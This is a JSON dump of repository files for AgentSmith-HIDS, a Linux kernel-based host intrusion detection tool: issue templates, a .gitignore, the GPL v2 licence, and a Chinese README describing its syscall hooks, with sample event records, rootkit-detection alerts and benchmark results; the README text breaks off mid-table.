[
  {
    "path": ".github/ISSUE_TEMPLATE/bug_report.md",
    "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Describe the bug**\nA clear and concise description of what the bug is.\n\n**To Reproduce**\nSteps to reproduce the behavior:\n1. Go to '...'\n2. Click on '....'\n3. Scroll down to '....'\n4. See error\n\n**Expected behavior**\nA clear and concise description of what you expected to happen.\n\n**Screenshots**\nIf applicable, add screenshots to help explain your problem.\n\n**Desktop (please complete the following information):**\n - OS: [e.g. iOS]\n - Browser [e.g. chrome, safari]\n - Version [e.g. 22]\n\n**Smartphone (please complete the following information):**\n - Device: [e.g. iPhone6]\n - OS: [e.g. iOS8.1]\n - Browser [e.g. stock browser, safari]\n - Version [e.g. 22]\n\n**Additional context**\nAdd any other context about the problem here.\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/custom.md",
    "content": "---\nname: Custom issue template\nabout: Describe this issue template's purpose here.\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/feature_request.md",
    "content": "---\nname: Feature request\nabout: Suggest an idea for this project\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Is your feature request related to a problem? Please describe.**\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\n\n**Describe the solution you'd like**\nA clear and concise description of what you want to happen.\n\n**Describe alternatives you've considered**\nA clear and concise description of any alternative solutions or features you've considered.\n\n**Additional context**\nAdd any other context or screenshots about the feature request here.\n"
  },
  {
    "path": ".gitignore",
    "content": "# Created by .ignore support plugin (hsz.mobi)\n### C template\n# Prerequisites\n*.d\n\n# Object files\n*.o\n*.obj\n*.elf\n\n# Linker output\n*.ilk\n*.map\n*.exp\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Libraries\n*.lib\n*.a\n*.la\n*.lo\n\n# Shared objects (inc. Windows DLLs)\n*.dll\n*.so\n*.so.*\n*.dylib\n\n# Executables\n*.exe\n*.out\n*.app\n*.i*86\n*.x86_64\n*.hex\n\n# Debug files\n*.dSYM/\n*.su\n*.idb\n*.pdb\n\n# Kernel Module Compile Results\n*.cmd\n.tmp_versions/\nmodules.order\nModule.symvers\nMkfile.old\ndkms.conf\n### Rust template\n# Generated by Cargo\n# will have compiled files and executables\n/target/\n\n# Remove Cargo.lock from gitignore if creating an executable, leave it for libraries\n# More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html\nCargo.lock\n\n# These are backup files generated by rustfmt\n**/*.rs.bk\n\n.DS_Store\n.idea/\n.vscode/"
  },
  {
    "path": "LICENSE",
    "content": "                    GNU GENERAL PUBLIC LICENSE\n                       Version 2, June 1991\n\n Copyright (C) 1989, 1991 Free Software Foundation, Inc.,\n 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n                            Preamble\n\n  The licenses for most software are designed to take away your\nfreedom to share and change it.  By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users.  This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it.  (Some other Free Software Foundation software is covered by\nthe GNU Lesser General Public License instead.)  You can apply it to\nyour programs, too.\n\n  When we speak of free software, we are referring to freedom, not\nprice.  Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthis service if you wish), that you receive source code or can get it\nif you want it, that you can change the software or use pieces of it\nin new free programs; and that you know you can do these things.\n\n  To protect your rights, we need to make restrictions that forbid\nanyone to deny you these rights or to ask you to surrender the rights.\nThese restrictions translate to certain responsibilities for you if you\ndistribute copies of the software, or if you modify it.\n\n  For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must give the recipients all the rights that\nyou have.  You must make sure that they, too, receive or can get the\nsource code.  
And you must show them these terms so they know their\nrights.\n\n  We protect your rights with two steps: (1) copyright the software, and\n(2) offer you this license which gives you legal permission to copy,\ndistribute and/or modify the software.\n\n  Also, for each author's protection and ours, we want to make certain\nthat everyone understands that there is no warranty for this free\nsoftware.  If the software is modified by someone else and passed on, we\nwant its recipients to know that what they have is not the original, so\nthat any problems introduced by others will not reflect on the original\nauthors' reputations.\n\n  Finally, any free program is threatened constantly by software\npatents.  We wish to avoid the danger that redistributors of a free\nprogram will individually obtain patent licenses, in effect making the\nprogram proprietary.  To prevent this, we have made it clear that any\npatent must be licensed for everyone's free use or not licensed at all.\n\n  The precise terms and conditions for copying, distribution and\nmodification follow.\n\n                    GNU GENERAL PUBLIC LICENSE\n   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n  0. This License applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed\nunder the terms of this General Public License.  The \"Program\", below,\nrefers to any such program or work, and a \"work based on the Program\"\nmeans either the Program or any derivative work under copyright law:\nthat is to say, a work containing the Program or a portion of it,\neither verbatim or with modifications and/or translated into another\nlanguage.  (Hereinafter, translation is included without limitation in\nthe term \"modification\".)  Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not\ncovered by this License; they are outside its scope.  
The act of\nrunning the Program is not restricted, and the output from the Program\nis covered only if its contents constitute a work based on the\nProgram (independent of having been made by running the Program).\nWhether that is true depends on what the Program does.\n\n  1. You may copy and distribute verbatim copies of the Program's\nsource code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate\ncopyright notice and disclaimer of warranty; keep intact all the\nnotices that refer to this License and to the absence of any warranty;\nand give any other recipients of the Program a copy of this License\nalong with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and\nyou may at your option offer warranty protection in exchange for a fee.\n\n  2. You may modify your copy or copies of the Program or any portion\nof it, thus forming a work based on the Program, and copy and\ndistribute such modifications or work under the terms of Section 1\nabove, provided that you also meet all of these conditions:\n\n    a) You must cause the modified files to carry prominent notices\n    stating that you changed the files and the date of any change.\n\n    b) You must cause any work that you distribute or publish, that in\n    whole or in part contains or is derived from the Program or any\n    part thereof, to be licensed as a whole at no charge to all third\n    parties under the terms of this License.\n\n    c) If the modified program normally reads commands interactively\n    when run, you must cause it, when started running for such\n    interactive use in the most ordinary way, to print or display an\n    announcement including an appropriate copyright notice and a\n    notice that there is no warranty (or else, saying that you provide\n    a warranty) and that users may redistribute the program under\n    these conditions, and telling the user how to view a copy of this\n  
  License.  (Exception: if the Program itself is interactive but\n    does not normally print such an announcement, your work based on\n    the Program is not required to print an announcement.)\n\nThese requirements apply to the modified work as a whole.  If\nidentifiable sections of that work are not derived from the Program,\nand can be reasonably considered independent and separate works in\nthemselves, then this License, and its terms, do not apply to those\nsections when you distribute them as separate works.  But when you\ndistribute the same sections as part of a whole which is a work based\non the Program, the distribution of the whole must be on the terms of\nthis License, whose permissions for other licensees extend to the\nentire whole, and thus to each and every part regardless of who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest\nyour rights to work written entirely by you; rather, the intent is to\nexercise the right to control the distribution of derivative or\ncollective works based on the Program.\n\nIn addition, mere aggregation of another work not based on the Program\nwith the Program (or with a work based on the Program) on a volume of\na storage or distribution medium does not bring the other work under\nthe scope of this License.\n\n  3. 
You may copy and distribute the Program (or a work based on it,\nunder Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you also do one of the following:\n\n    a) Accompany it with the complete corresponding machine-readable\n    source code, which must be distributed under the terms of Sections\n    1 and 2 above on a medium customarily used for software interchange; or,\n\n    b) Accompany it with a written offer, valid for at least three\n    years, to give any third party, for a charge no more than your\n    cost of physically performing source distribution, a complete\n    machine-readable copy of the corresponding source code, to be\n    distributed under the terms of Sections 1 and 2 above on a medium\n    customarily used for software interchange; or,\n\n    c) Accompany it with the information you received as to the offer\n    to distribute corresponding source code.  (This alternative is\n    allowed only for noncommercial distribution and only if you\n    received the program in object code or executable form with such\n    an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for\nmaking modifications to it.  For an executable work, complete source\ncode means all the source code for all modules it contains, plus any\nassociated interface definition files, plus the scripts used to\ncontrol compilation and installation of the executable.  
However, as a\nspecial exception, the source code distributed need not include\nanything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component\nitself accompanies the executable.\n\nIf distribution of executable or object code is made by offering\naccess to copy from a designated place, then offering equivalent\naccess to copy the source code from the same place counts as\ndistribution of the source code, even though third parties are not\ncompelled to copy the source along with the object code.\n\n  4. You may not copy, modify, sublicense, or distribute the Program\nexcept as expressly provided under this License.  Any attempt\notherwise to copy, modify, sublicense or distribute the Program is\nvoid, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under\nthis License will not have their licenses terminated so long as such\nparties remain in full compliance.\n\n  5. You are not required to accept this License, since you have not\nsigned it.  However, nothing else grants you permission to modify or\ndistribute the Program or its derivative works.  These actions are\nprohibited by law if you do not accept this License.  Therefore, by\nmodifying or distributing the Program (or any work based on the\nProgram), you indicate your acceptance of this License to do so, and\nall its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n  6. Each time you redistribute the Program (or any work based on the\nProgram), the recipient automatically receives a license from the\noriginal licensor to copy, distribute or modify the Program subject to\nthese terms and conditions.  
You may not impose any further\nrestrictions on the recipients' exercise of the rights granted herein.\nYou are not responsible for enforcing compliance by third parties to\nthis License.\n\n  7. If, as a consequence of a court judgment or allegation of patent\ninfringement or for any other reason (not limited to patent issues),\nconditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License.  If you cannot\ndistribute so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you\nmay not distribute the Program at all.  For example, if a patent\nlicense would not permit royalty-free redistribution of the Program by\nall those who receive copies directly or indirectly through you, then\nthe only way you could satisfy both it and this License would be to\nrefrain entirely from distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under\nany particular circumstance, the balance of the section is intended to\napply and the section as a whole is intended to apply in other\ncircumstances.\n\nIt is not the purpose of this section to induce you to infringe any\npatents or other property right claims or to contest validity of any\nsuch claims; this section has the sole purpose of protecting the\nintegrity of the free software distribution system, which is\nimplemented by public license practices.  Many people have made\ngenerous contributions to the wide range of software distributed\nthrough that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing\nto distribute software through any other system and a licensee cannot\nimpose that choice.\n\nThis section is intended to make thoroughly clear what is believed to\nbe a consequence of the rest of this License.\n\n  8. 
If the distribution and/or use of the Program is restricted in\ncertain countries either by patents or by copyrighted interfaces, the\noriginal copyright holder who places the Program under this License\nmay add an explicit geographical distribution limitation excluding\nthose countries, so that distribution is permitted only in or among\ncountries not thus excluded.  In such case, this License incorporates\nthe limitation as if written in the body of this License.\n\n  9. The Free Software Foundation may publish revised and/or new versions\nof the General Public License from time to time.  Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\nEach version is given a distinguishing version number.  If the Program\nspecifies a version number of this License which applies to it and \"any\nlater version\", you have the option of following the terms and conditions\neither of that version or of any later version published by the Free\nSoftware Foundation.  If the Program does not specify a version number of\nthis License, you may choose any version ever published by the Free Software\nFoundation.\n\n  10. If you wish to incorporate parts of the Program into other free\nprograms whose distribution conditions are different, write to the author\nto ask for permission.  For software which is copyrighted by the Free\nSoftware Foundation, write to the Free Software Foundation; we sometimes\nmake exceptions for this.  Our decision will be guided by the two goals\nof preserving the free status of all derivatives of our free software and\nof promoting the sharing and reuse of software generally.\n\n                            NO WARRANTY\n\n  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY\nFOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  
EXCEPT WHEN\nOTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES\nPROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,\nREPAIR OR CORRECTION.\n\n  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR\nREDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED\nTO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY\nYOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER\nPROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n\n                     END OF TERMS AND CONDITIONS\n\n            How to Apply These Terms to Your New Programs\n\n  If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n  To do so, attach the following notices to the program.  
It is safest\nto attach them to the start of each source file to most effectively\nconvey the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n    <one line to give the program's name and a brief idea of what it does.>\n    Copyright (C) <year>  <name of author>\n\n    This program is free software; you can redistribute it and/or modify\n    it under the terms of the GNU General Public License as published by\n    the Free Software Foundation; either version 2 of the License, or\n    (at your option) any later version.\n\n    This program is distributed in the hope that it will be useful,\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n    GNU General Public License for more details.\n\n    You should have received a copy of the GNU General Public License along\n    with this program; if not, write to the Free Software Foundation, Inc.,\n    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this\nwhen it starts in an interactive mode:\n\n    Gnomovision version 69, Copyright (C) year name of author\n    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n    This is free software, and you are welcome to redistribute it\n    under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License.  Of course, the commands you use may\nbe called something other than `show w' and `show c'; they could even be\nmouse-clicks or menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your\nschool, if any, to sign a \"copyright disclaimer\" for the program, if\nnecessary.  
Here is a sample; alter the names:\n\n  Yoyodyne, Inc., hereby disclaims all copyright interest in the program\n  `Gnomovision' (which makes passes at compilers) written by James Hacker.\n\n  <signature of Ty Coon>, 1 April 1989\n  Ty Coon, President of Vice\n\nThis General Public License does not permit incorporating your program into\nproprietary programs.  If your program is a subroutine library, you may\nconsider it more useful to permit linking proprietary applications with the\nlibrary.  If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License.\n"
  },
  {
    "path": "README-zh_CN.md",
    "content": "# AgentSmith-HIDS\n\n&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;--项目名称灵感来源于电影《黑客帝国》\n\n\n\n\n[![License](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://github.com/DianrongSecurity/AgentSmith-HIDS/blob/master/LICENSE) [![Project Status: Active – The project has reached a stable, usable state and is being actively developed.](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active)\n\n[English](README.md) | 简体中文\n\n# THIS REPO IS OLD \n# RELEASE VERSION: https://github.com/bytedance/Elkeid\n\n\n### 关于AgentSmith-HIDS\n\nAgentSmith-HIDS严格意义上并不是一个“Host-based Intrusion Detection System”，因为目前开源的部分来讲它缺乏了规则引擎和相关检测的能力，但是它可以作为一个高性能“主机信息收集工具”来构建属于你自己的HIDS。\n由于AgentSmit-HIDS的特点(**从内核态获取尽可能全的数据**)，对比用户态的HIDS拥有巨大的优势：\n\n* **性能更优**，通过内核态驱动来获取信息，无需诸如遍历/proc这样的行为进行数据补全；传输方案使用共享内存，而不是netlink，相对来说也有更好的性能表现。\n* **难以绕过**，由于我们的信息获取是来自于内核态驱动，因此面对很多刻意隐藏自己的行为如rootkit难以绕过我们的监控。\n* **为联动而生**，我们不仅可以作为安全工具，也可以作为监控，或者梳理内部资产。我们通过内核模块对进程/用户/文件/网络连接进行梳理，如果有CMDB的信息，那么联动后你将会得到一张从网络到主机/容器/业务信息的调用/依赖关系图；如果你们还有DB Audit Tool，那么联动后你可以得到DB User/库表字段/应用/网络/主机容器的关系；等等，还可以和NIDS/威胁情报联动，达到溯源的目的。\n* **用户态+内核态**，AgentSmith-HIDS同时拥有内核态和用户态的模块，可以形成互补。\n\n\n\n### AgentSmith-HIDS实现了以下的主要功能：\n\n* 内核模块通过kprobeHook了**execve,connect,process inject, create file,DNS query,load LKM**的行为，并且通过对Linux namespace兼容的方式实现了对容器行为的信息收集\n* 用户态支持自定义检测模块，目前已内置：**系统用户列表查询**，**系统端口监听列表查询**，**系统RPM LIST查询**，**系统定时任务查询**\n* **部分Rootkit检测能力**，From: [Tyton](https://github.com/nbulischeck/tyton) ，目前已经移植了**PROC_FILE_HOOK**，**SYSCALL_HOOK**，**LKM_HIDDEN**，**INTERRUPTS_HOOK**，目前仅支持Kernel > 3.10。\n* cred 变化检测 （sudo/su/sshd除外）\n* 用户登陆监控\n\n\n### AgentSmith-HIDS的使用场景/方式(待补充)\n\n* [如何利用AgentSmith-HIDS检测反弹shell](doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/如何利用AgentSmith-HIDS检测反弹shell.md)\n\n\n\n### 关于内核版本兼容性\n\n* Kernel > 2.6.25\n* AntiRootKit > 
3.10\n\n\n\n### 对容器的兼容\n\n| 行为源 | Nodename       |\n| ------ | -------------- |\n| Host   | hostname       |\n| Docker | container name |\n| k8s    | pod name       |\n\n\n\n\n### AgentSmith-HIDS的组成部分\n\n* **内核驱动模块（LKM）**，通过kprobe hook关键函数，进行数据捕获；\n* **用户态Agent**，收取驱动捕获的指令并进行处理，然后将数据发送到Kafka；并向Server发送心跳确认存活，以及接受Server下发的指令进行执行；\n* **Agent Server端**，向Agent下发指令，以及来查看当前Agent状态数量等信息；（可选组件）\n\n\n\n### Execve Hook\n\n通过Hook **sys_execve()/sys_execveat()/compat_sys_execve()/compat_sys_execveat()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"59\",\n    \"run_path\":\"/tmp\",\n    \"exe\":\"/opt/ltp/testcases/bin/growfiles\",\n    \"argv\":\"growfiles -W gf26 -D 0 -b -i 0 -L 60 -u -B 1000b -e 1 -r 128-32768:128 -R 512-64000 -T 4 -f gfsmallio-35861 -d /tmp/ltp-Ujxl8kKsKY \",\n    \"pid\":\"35861\",\n    \"ppid\":\"35711\",\n    \"pgid\":\"35861\",\n    \"tgid\":\"35861\",\n    \"comm\":\"growfiles\",\n    \"nodename\":\"test\",\n    \"stdin\":\"/dev/pts/1\",\n    \"stdout\":\"/dev/pts/1\",\n    \"sessionid\":\"3\",\n    \"sip\":\"192.168.165.1\",\n    \"sport\":\"61726\",\n    \"dip\":\"192.168.165.128\",\n    \"dport\":\"22\",\n    \"sa_family\":\"1\",\n    \"pid_tree\":\"1(systemd)->1384(sshd)->2175(sshd)->2177(bash)->2193(fish)->35552(runltp)->35711(ltp-pan)->35861(growfiles)\",\n    \"tty_name\":\"pts1\",\n    \"socket_process_pid\":\"2175\",\n    \"socket_process_exe\":\"/usr/sbin/sshd\",\n    \"SSH_CONNECTION\":\"192.168.165.1 61726 192.168.165.128 22\",\n    \"LD_PRELOAD\":\"/root/ldpreload/test.so\",\n    \"user\":\"root\",\n    \"time\":\"1579575429143\",\n    \"local_ip\":\"192.168.165.128\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"01272152d4901fd3c2efacab5c0e38e5\",\n    \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n### Bind Hook\n\n通过Hook **sys_bind()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"49\",\n    \"sa_family\":\"2\",\n    \"exe\":\"/usr/bin/python2.7\",\n    
\"pid\":\"109640\",\n    \"ppid\":\"215496\",\n    \"pgid\":\"109640\",\n    \"tgid\":\"109640\",\n    \"comm\":\"python\",\n    \"nodename\":\"n225-117-018\",\n    \"sip\":\"0.0.0.0\",\n    \"sport\":\"8000\",\n    \"res\":\"0\",\n    \"sessionid\":\"30\",\n    \"user\":\"root\",\n    \"time\":\"1587540231936\",\n    \"local_ip_str\":\"10.225.117.18\",\n    \"hostname_str\":\"n225-117-018\",\n    \"exe_md5\":\"4f458165a2129ba549f1b6605ee87e74\"\n}\n```\n\n\n### Connect Hook\n\n通过Hook **tcp_v4_connect()/tcp_v6_connect()/ip4_datagram_connect()/ip6_datagram_connect()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"42\",\n    \"sa_family\":\"2\",\n    \"connect_type\":\"4\",\n    \"dport\":\"1025\",\n    \"dip\":\"180.101.49.11\",\n    \"exe\":\"/usr/bin/ping\",\n    \"pid\":\"6294\",\n    \"ppid\":\"1941\",\n    \"pgid\":\"6294\",\n    \"tgid\":\"6294\",\n    \"comm\":\"ping\",\n    \"nodename\":\"test\",\n    \"sip\":\"192.168.165.153\",\n    \"sport\":\"45524\",\n    \"res\":\"0\",\n    \"sessionid\":\"1\",\n    \"user\":\"root\",\n    \"time\":\"1575721921240\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"735ae70b4ceb8707acc40bc5a3d06e04\"\n}\n```\n\n\n\n### DNS Query Hook\n\n通过Hook **udp_recvmsg()/udpv6_recvmsg()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"601\",\n    \"sa_family\":\"2\",\n    \"dport\":\"53\",\n    \"dip\":\"192.168.165.2\",\n    \"exe\":\"/usr/bin/ping\",\n    \"pid\":\"6294\",\n    \"ppid\":\"1941\",\n    \"pgid\":\"6294\",\n    \"tgid\":\"6294\",\n    \"comm\":\"ping\",\n    \"nodename\":\"test\",\n    \"sip\":\"192.168.165.153\",\n    \"sport\":\"53178\",\n    \"qr\":\"1\",\n    \"opcode\":\"0\",\n    \"rcode\":\"0\",\n    \"query\":\"www.baidu.com\",\n    \"sessionid\":\"1\",\n    \"user\":\"root\",\n    \"time\":\"1575721921240\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    
\"exe_md5\":\"39c45487a85e26ce5755a893f7e88293\"\n}\n```\n\n\n### Create File Hook\n\n通过Hook **security_inode_create()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"602\",\n    \"exe\":\"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java\",\n    \"file_path\":\"/tmp/kafka-logs/replication-offset-checkpoint.tmp\",\n    \"pid\":\"3341\",\n    \"ppid\":\"1\",\n    \"pgid\":\"2657\",\n    \"tgid\":\"2659\",\n    \"comm\":\"kafka-scheduler\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"3\",\n    \"user\":\"root\",\n    \"time\":\"1575721984257\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"215be70a38c3a2e14e09d637c85d5311\",\n    \"create_file_md5\":\"d41d8cd98f00b204e9800998ecf8427e\"\n}\n```\n\n\n\n### Process Inject Hook\n\n通过Hook **sys_ptrace()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"101\",\n    \"ptrace_request\":\"4\",\n    \"target_pid\":\"7402\",\n    \"addr\":\"00007ffe13011ee6\",\n    \"data\":\"-a\",\n    \"exe\":\"/root/ptrace/ptrace\",\n    \"pid\":\"7401\",\n    \"ppid\":\"1941\",\n    \"pgid\":\"7401\",\n    \"tgid\":\"7401\",\n    \"comm\":\"ptrace\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"1\",\n    \"user\":\"root\",\n    \"time\":\"1575722717065\",\n    \"local_ip\":\"192.168.165.153\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Load LKM File Hook\n\n通过Hook **load_module()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"603\",\n    \"exe\":\"/usr/bin/kmod\",\n    \"lkm_file\":\"/root/ptrace/ptrace\",\n    \"pid\":\"29461\",\n    \"ppid\":\"9766\",\n    \"pgid\":\"29461\",\n    \"tgid\":\"29461\",\n    \"comm\":\"insmod\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"13\",\n    \"user\":\"root\",\n    \"time\":\"1577212873791\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"0010433ab9105d666b044779f36d6d1e\",\n    
\"load_file_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Cred Change Hook\n\n通过Hook **commit_creds()** 实现，数据样例：\n\n```json\n{\n    \"uid\":\"0\",\n    \"data_type\":\"604\",\n    \"exe\":\"/tmp/tt\",\n    \"pid\":\"27737\",\n    \"ppid\":\"26865\",\n    \"pgid\":\"27737\",\n    \"tgid\":\"27737\",\n    \"comm\":\"tt\",\n    \"old_uid\":\"1000\",\n    \"nodename\":\"test\",\n    \"sessionid\":\"42\",\n    \"user\":\"root\",\n    \"time\":\"1578396197131\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\",\n    \"exe_md5\":\"d99a695d2dc4b5099383f30964689c55\"\n}\n```\n\n\n### User Login Alert\n```json\n{\n    \"data_type\":\"1001\",\n    \"status\":\"Failed\",\n    \"type\":\"password\",\n    \"user_exsit\":\"false\",\n    \"user\":\"sad\",\n    \"from_ip\":\"192.168.165.1\",\n    \"port\":\"63089\",\n    \"processor\":\"ssh2\",\n    \"time\":\"1578405483119\",\n    \"local_ip\":\"192.168.165.128\",\n    \"hostname\":\"localhost.localdomain\"\n}\n```\n\n\n### PROC File Hook Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"700\",\n    \"module_name\":\"autoipv6\",\n    \"hidden\":\"0\",\n    \"time\":\"1578384987766\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### Syscall Hook Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"701\",\n    \"module_name\":\"diamorphine\",\n    \"hidden\":\"1\",\n    \"syscall_number\":\"78\",\n    \"time\":\"1578384927606\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### LKM Hidden Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"702\",\n    \"module_name\":\"diamorphine\",\n    \"hidden\":\"1\",\n    \"time\":\"1578384927606\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### Interrupts Hook Alert\n```json\n{\n    \"uid\":\"-1\",\n    \"data_type\":\"703\",\n    \"module_name\":\"syshook\",\n    \"hidden\":\"1\",\n    \"interrupt_number\":\"2\",\n    
\"time\":\"1578384927606\",\n    \"local_ip\":\"192.168.165.152\",\n    \"hostname\":\"test\"\n}\n```\n\n\n### 关于性能\n\n测试环境(VM)：\n\n| CPU       |  Intel(R) Xeon(R) Platinum 8260 CPU @ 2.40GHz    4核 |\n| --------- | ------------------------------------------------ |\n| RAM       | 8GB                                              |\n| OS/Kernel | Debian9  /  4.14.81.bm.19-amd64          |\n\n测试负载：\n\n`ltp -f syscalls`\n\n测试结果(1min)：\n\n| Hook Handler           | Average Delay(us) |  TP99(us) |   TP95(us) |   TP90(us) |\n| ---------------------- | ----------------- | ----|----|----|\n|   connect_entry_handler| 0.2914          |6.7627|0.355|0.3012|\n|   connect_handler      |   2.1406        |18.3801|12.102|7.832|\n|   execve_entry_handler |   5.9320        |13.7034|9.908|8.334|\n|   execve_handler       |   6.8826        |26.0584|15.9976|12.6260|\n|   security_inode_create_entry_handler|   1.9963|9.3042|6.7730|4.6816|\n|   security_inode_create_handler|   4.2114|13.2165|8.83775|6.534|\n\n原始测试数据：\n\n[Benchmark Data](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/benchmark_data)\n\n\n使用cyclictest进行测试\n\n`cyclictest -p 90 - m -c 0 -i 200 -n -h 100 -q -l 1000000`\n\nUninstall Smith：\n```\n# Total: 000999485\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 13905\n# Histogram Overflows: 00515\n```\n\ninstall Smith：\n```\n# Total: 000999519\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 15216\n# Histogram Overflows: 00481\n```\n\n\n**time -v /opt/ltp/testcases/bin/execve05 -n 30000**\n\n10 times\n\nInstall Smith：\n\n| Average User Time(s) |  Average System Time(s) |\n| 